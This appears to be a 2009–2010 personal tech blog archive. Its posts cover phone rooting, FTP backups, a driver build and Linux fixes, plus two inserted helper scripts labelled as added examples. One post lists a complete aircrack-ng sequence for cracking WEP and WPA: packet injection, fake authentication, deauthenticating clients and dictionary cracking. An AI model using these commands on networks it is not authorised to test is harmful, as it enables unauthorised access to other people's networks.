BackTrack
Getting root on your new Nexus One Android Google Phone
by HydTech on Jan.05, 2010, under Android, BackTrack, Linux (Ubuntu), OSX, fedora, opensuse, windows
The Nexus one was rooted before it even got released. Paul at modaco forums showed us how to perform this hack. I’ll try to simplify the method here.
1. First unlock your bootloader if you have a T-mobile Nexus One (this voids the warranty) or get an unlocked version from Google for like $550:
a. download fastboot
b. open terminal or command line and type
– Windows fastboot-windows oem unlock
– Mac ./fastboot-mac oem unlock
– Linux ./fastboot-linux oem unlock
2. Rewrite the Bootloader to obtain root privileges:
a. Download either SuperBoot or InsecureBoot and extract. (The difference is that with the insecure boot you won’t make any changes to the system and you would have to launch su manually)
b. Put the device in bootloader mode:
– Turn off the phone and restart holding the trackball.
c. Flash the bootloader:
– Windows = double click the windows bat file
– Mac = open terminal and cd to the directory containing the file, then type:
chmod +x install-superboot-mac.sh
./install-superboot-mac.sh
– Linux = open terminal and cd to the directory containing the file, then type:
chmod +x install-superboot-linux.sh
./install-superboot-linux.sh
Now you should have root!

Pic courtesy of Stericson.
Automatic website backup without SSH enabled over FTP
by HydTech on Dec.03, 2009, under BackTrack, Lenovo S10, Linux (Ubuntu), OSX, Webhosting, fedora, opensuse
Last time I backed up my website with rsync and ssh, but on my new host they disabled SSH. Rsync does not work over ftp. I do not want to do incremental backups with delta files as is done with rdiff-backup or duplicity. I need to have an exact mirror of my site. But remember that your SQL databases won’t be backed up.
Curlftpfs is the key! In this tutorial I will show you how to back up from one server to a backup location which can be your hard drive, another web host, dropbox folder, Box.net via webdav, etc.
Download curlftpfs, rsync and ncftp:
sudo apt-get install curlftpfs ncftp rsync
make directories to mount your ftp server:
sudo mkdir /media/hydtechblog
sudo mkdir /media/hydtechbackupserver
edit fstab to mount the ftp servers using curlftpfs:
sudo gedit /etc/fstab
add the lines and modify them according to your server:
curlftpfs#username:password@hydtechblog.com /media/hydtechblog fuse rw,allow_other,uid=root 0 0
curlftpfs#username:password@hydtechbackupserver /media/hydtechbackupserver fuse rw,allow_other,uid=root 0 0
One thing to remember is that these two will not mount automatically because when the computer restarts, the fstab is done while you are not connected to the network. To fix this we can just add the mount commands in our crontab.
Edit crontab:
sudo crontab -e
enter the following lines and modify accordingly:
00 09 * * * mount /media/hydtechblog
00 09 * * * mount /media/hydtechbackupserver
01 09 * * * rsync -avz --rsync-path=/usr/bin/rsync /media/hydtechblog/public_html /media/hydtechbackupserver/public_html
Press Ctrl+O to write the file and Ctrl+X to exit nano.
This will tell cron to mount the folders at 9:00 am and start rsync at 9:01 am. You can replace the backup location to another folder on your hard drive or your dropbox or ubuntu one folder. You can also mount box.net with webdav and use this method.
For encrypted incremental backups check out duplicity; it also works with webdav and ftp.
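The fstab-plus-cron procedure above has two weak spots a practitioner should check: /etc/fstab is world-readable, so any FTP password written into it is visible to every local account on the backup machine, and rsync without a trailing slash on the source copies the directory itself, nesting public_html inside public_html on the target. The script below is an added example, not the blog’s own, that wraps the same mount points from the post in a cron-friendly job: it flags inline credentials in fstab, verifies each curlftpfs mount actually came up before copying, and mirrors with trailing slashes. The log path, the `run` argument and the helper names are assumptions; curlftpfs is built on libcurl, so whether your build reads ~/.netrc (mode 0600) instead of an inline password is something to confirm in `man curlftpfs`.

```shell
#!/bin/sh
# Added example (not the blog's own script): mount the curlftpfs entries from
# /etc/fstab, check they really mounted, mirror the site, and log the result.
# The two mount points are the ones from the post; everything else is assumed.

SRC_MNT="${SRC_MNT:-/media/hydtechblog}"           # live site (from the post)
DST_MNT="${DST_MNT:-/media/hydtechbackupserver}"   # backup host (from the post)
LOG="${LOG:-/var/log/site-backup.log}"             # assumed log location

# fstab_inline_creds FILE: print the mount point of every curlftpfs entry whose
# source embeds user:password@host. Returns 1 if any were found, 0 otherwise.
# /etc/fstab is world-readable, so such passwords are visible to every local user.
fstab_inline_creds() {
    hits=$(awk '$1 ~ /^curlftpfs#/ && $1 ~ /:[^@]*@/ { print $2 }' "$1")
    [ -z "$hits" ] && return 0
    printf '%s\n' "$hits"
    return 1
}

# ensure_mounted DIR: mount DIR via its fstab entry unless it is already a mount
# point; fail if it still is not one afterwards (FTP host unreachable, etc.).
# Without this check, an unmounted directory is just an empty local folder and
# rsync would happily "mirror" nothing into it.
ensure_mounted() {
    mountpoint -q "$1" && return 0
    mount "$1" || return 1
    mountpoint -q "$1"
}

# mirror_site SRC DST: one-way mirror of public_html. The trailing slashes copy
# the directory contents rather than nesting public_html inside public_html.
# --delete makes the copy an exact mirror (files removed from the site are
# removed from the backup too); drop it to keep the add/update-only behaviour
# of the rsync line in the post.
mirror_site() {
    rsync -av --delete --rsync-path=/usr/bin/rsync \
        "$1/public_html/" "$2/public_html/"
}

main() {
    if ! fstab_inline_creds /etc/fstab >/dev/null; then
        echo "warning: /etc/fstab embeds FTP passwords readable by all local users" >&2
    fi
    for d in "$SRC_MNT" "$DST_MNT"; do
        ensure_mounted "$d" || { echo "$(date) mount failed: $d" >> "$LOG"; exit 1; }
    done
    if mirror_site "$SRC_MNT" "$DST_MNT" >> "$LOG" 2>&1; then
        echo "$(date) backup ok" >> "$LOG"
    else
        echo "$(date) rsync failed (see above)" >> "$LOG"
        exit 1
    fi
}

# Only run when invoked as "site-backup.sh run", e.g. from root's crontab:
#   05 09 * * * /usr/local/sbin/site-backup.sh run
if [ "${1:-}" = "run" ]; then
    main
fi
```

Because the script mounts on demand, a single cron line replaces the three in the post, and a mount that silently failed after a reboot (the problem the post works around) produces a logged error instead of an empty backup.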
Revealing Opera wand passwords on Ubuntu Linux and OS X
by HydTech on Nov.23, 2009, under BackTrack, Linux (Ubuntu), fedora, opensuse
There are several utilities in Windows which reveal the opera wand password and I haven’t used windows in forever. The Opera wiki has a Power button which can help capture your password while logging in to the site. Click this link in Opera and it will install a button which you can drag to any panel. While on a page which requires a password, you can click on this new wand instead of your original wand.
Voila!
How to make the Broadcom 4312 Wireless driver work in BackTrack 4 on the Lenovo S10
by HydTech on Sep.25, 2009, under BackTrack, Lenovo S10, Linux (Ubuntu)
This guide is adapted from Kazalku’s guide on remote exploit forums. Thanks Kazalku.
Download this driver and transfer it with a USB or boot up into another OS on your multiboot and save it in the BT root folder from here.
Untar it:
tar -xvzf hybrid-portsrc-x86_32-v5_10_91_9-3.tar.gz
Build the module:
make -C /lib/modules/`uname -r`/build M=`pwd`
Insert the modules:
modprobe ieee80211_crypt_tkip
insmod wl.ko
Now the network device should show up as claimed by the driver. You can check with:
lshw -C network
Bring it up:
ifconfig eth1 up
To load the module upon boot:
cp wl.ko /lib/modules/`uname -r`/kernel/net/wireless
depmod -a
modprobe wl
Load the module at every startup:
kate /etc/modules
add the following and close the text editor:
ieee80211_crypt_tkip
wl
Load NetworkManager and Configure KnetworkManager:
Type NetworkManager in a konsole and configure the wireless at the bottom right.
Delete the files you created in the root folder now that you don’t need them.
Cracking WEP & WPA with IBM Lenovo X60 – Basics
by HydTech on Sep.14, 2009, under BackTrack, Linux (Ubuntu), fedora, opensuse
At first injection with the Intel pro wireless cards was impossible. Then came the ipwraw driver. Now, we no longer need the ipwraw as the iwl3945 card supports injection. Most linux distros now ship with this driver.
Follow these steps for a successful WEP crack in Ubuntu:
download necessary files
sudo apt-get install aircrack-ng
place card in monitor mode
sudo airmon-ng start wlan0
test injection
sudo aireplay-ng -9 -e linksys -a 00:14:6C:7E:40:80 mon0
(0% means injection not working)
capture data and write to file called output
sudo airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w output mon0
fake authentication
sudo aireplay-ng -1 0 -e linksys -a 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 mon0
replay mode
sudo aireplay-ng -3 -b 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 mon0
run aircrack
sudo aircrack-ng -z -b 00:14:6C:7E:40:80 output*.cap
For WPA cracking follow this:
monitor mode
sudo airmon-ng start wlan0
collect handshake
sudo airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w psk mon0
deauth connected client
sudo aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:FD:FB:C2 mon0
cracking
sudo aircrack-ng -w password.lst -b 00:14:6C:7E:40:80 psk*.cap
These are just refreshers. For more help check www.aircrack-ng.org
Freenx nx server problem in Ubuntu Jaunty 9.04
by HydTech on Jul.01, 2009, under BackTrack, Linux (Ubuntu), fedora, opensuse
After upgrading to Jaunty, I never managed to successfully connect to my desktop using NX. I use a windows computer with nomachine nx client. I always got an error like this:
Info: Proxy running in client mode with pid '1728'
Session: Starting session at 'Sat Jan 12 16:34:05 2008'.
Warning: Connected to remote version 3.0.0 with local version 3.1.0
Info: Connection with remote proxy completed.
Warning: Unrecognized session type 'unix-desktop'. Assuming agent session.
Info: Using ADSL link parameters 512/24/1/0.
Info: Using cache parameters 4/4096KB/16384KB/16384KB.
Info: Using pack method 'adaptive-7' with session 'unix-gnome'.
Info: Using ZLIB data compression 1/1/32.
Info: Using ZLIB stream compression 4/4.
Info: No suitable cache file found.
Info: Forwarding X11 connections to display ':0'.
Info: Forwarding multimedia connections to port '6000'.
Info: Listening to font server connections on port '11000'.
Session: Session started at 'Sat Jan 12 16:58:19 2008'.
Info: Established X server connection.
Info: Using shared memory parameters 0/0K.
Session: Terminating session at 'Sat Jan 12 16:58:19 2008'.
Session: Session terminated at 'Sat Jan 12 16:58:19 2008'.
After hours of searching the web, I concluded the problem is with the ownership and permissions of the .Xauthority file. Here’s how I fixed it:
sudo chown hydtech /home/hydtech/.Xauthority
sudo chgrp hydtech /home/hydtech/.Xauthority
and delete the leftover lock files:
sudo rm /home/hydtech/.Xauthority-l
sudo rm /home/hydtech/.Xauthority-c
Now it works like a charm.
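The two lock files removed above (.Xauthority-c and .Xauthority-l) are what xauth creates while it rewrites the cookie file and normally deletes again; when a session dies mid-write they linger and block later updates, which is why an NX session can connect and then terminate at once. The functions below are an added example, not the blog’s commands, that check the state before changing it: report stale locks, report the current owner, and only then apply the chown/remove fix from the post, tightening the file to mode 600 since it holds the X cookie. The home directory and user name are inputs; nothing else is assumed about the machine.

```shell
#!/bin/sh
# Added example (not the blog's own commands): inspect the .Xauthority state the
# post describes before fixing it. HOME directory and USER are caller inputs.

# xauth_stale_locks HOME: print any xauth lock files left behind. xauth creates
# HOME/.Xauthority-c and HOME/.Xauthority-l around every write and removes them
# afterwards, so any that survive a session are stale. Returns 1 if some exist.
xauth_stale_locks() {
    found=0
    for f in "$1/.Xauthority-c" "$1/.Xauthority-l"; do
        if [ -e "$f" ]; then
            printf '%s\n' "$f"
            found=1
        fi
    done
    return $found
}

# xauth_owner HOME: print the user that owns HOME/.Xauthority (GNU stat).
# A mismatch with the login user is the root cause reported in the post.
xauth_owner() {
    stat -c '%U' "$1/.Xauthority"
}

# xauth_fix HOME USER: apply the post's fix, but only where it is needed:
# re-own the cookie file to USER (and USER's primary group), remove stale lock
# files, and make the file private, because it holds the X authentication cookie.
xauth_fix() {
    home="$1"; user="$2"
    if [ ! -e "$home/.Xauthority" ]; then
        echo "no .Xauthority in $home" >&2
        return 1
    fi
    if [ "$(xauth_owner "$home")" != "$user" ]; then
        chown "$user:$(id -gn "$user")" "$home/.Xauthority" || return 1
    fi
    xauth_stale_locks "$home" | while read -r f; do
        rm -f "$f"
    done
    chmod 600 "$home/.Xauthority"
}

# Usage from a root shell, e.g.:  xauth_fix /home/hydtech hydtech
# Guarded so sourcing this file for its functions does nothing.
if [ "${1:-}" = "fix" ] && [ -n "${2:-}" ] && [ -n "${3:-}" ]; then
    xauth_fix "$2" "$3"
fi
```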
How to Install packages with slapt-get or gslapt in BackTrack 3
by HydTech on Apr.21, 2009, under BackTrack, Linux (Ubuntu)
Once BackTrack is installed on the hard drive, open the menu and go to K -> BackTrack -> Penetration -> Fast Track
type:
./fast-track.py -i

Enter the Fast-Track updates menu (1).
Update everything (9).

After the update finishes, select the Installation menu (8).
Install everything (8).
Go back to the Installation menu, select Install Slapt-Get (1)
Install Slapt-Get (2), then select update SlackWare (1).
Exit (10)
Now, you can use slapt-get to install packages from the slackware repositories. For example, if you want to install mozilla-thunderbird:
Make sure it exists in the repositories:
slapt-get --search thunderbird
If you find it, use the install parameter to install it:
slapt-get --install mozilla-thunderbird-2.0.0.21-i686-1

You can also use the GUI front-end for slapt-get, but it is broken by default in BT3, so let’s reinstall it:
slapt-get --install --reinstall gslapt